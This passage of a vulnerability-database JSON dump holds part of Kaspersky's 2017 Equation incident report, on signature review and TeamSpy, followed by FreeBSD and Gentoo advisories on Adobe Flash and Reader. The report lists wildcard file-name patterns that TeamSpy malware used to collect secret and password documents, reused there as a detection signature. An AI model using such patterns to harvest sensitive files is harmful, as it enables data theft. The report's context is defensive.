this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given that system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives; A path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nCritical vulnerabilities have been identified in Adobe\n\t Flash Player version 10.0.45.2 and earlier. These\n\t vulnerabilities could cause the application to crash and\n\t could potentially allow an attacker to take control of the\n\t affected system.\n\n", "edition": 4, "modified": "2008-10-02T00:00:00", "published": "2008-10-02T00:00:00", "id": "144E524A-77EB-11DF-AE06-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/144e524a-77eb-11df-ae06-001b2134ef46.html", "title": "linux-flashplugin -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:04", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-0196", "CVE-2010-2211", "CVE-2010-0192", "CVE-2010-2201", "CVE-2009-3953", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-0204", "CVE-2010-0190", "CVE-2010-2207", "CVE-2010-0186", "CVE-2010-0198", "CVE-2010-2203", "CVE-2010-0193", "CVE-2010-2210", "CVE-2009-4324", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-0188", "CVE-2010-2204", "CVE-2010-0194", "CVE-2010-1285", "CVE-2010-0191", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-0195", "CVE-2010-0201", "CVE-2010-0197", "CVE-2010-2208", "CVE-2010-2168", "CVE-2010-0203", "CVE-2010-1241", "CVE-2010-0199", "CVE-2010-0202"], "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Reader. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker might entice a user to open a specially crafted PDF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or bypass intended sandbox restrictions, make cross-domain requests, inject arbitrary web script or HTML, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.3.4\"", "edition": 1, "modified": "2010-09-07T00:00:00", "published": "2010-09-07T00:00:00", "id": "GLSA-201009-05", "href": "https://security.gentoo.org/glsa/201009-05", "type": "gentoo", "title": "Adobe Reader: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Flash Player. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.1.102.64\"", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "GLSA-201101-09", "href": "https://security.gentoo.org/glsa/201101-09", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
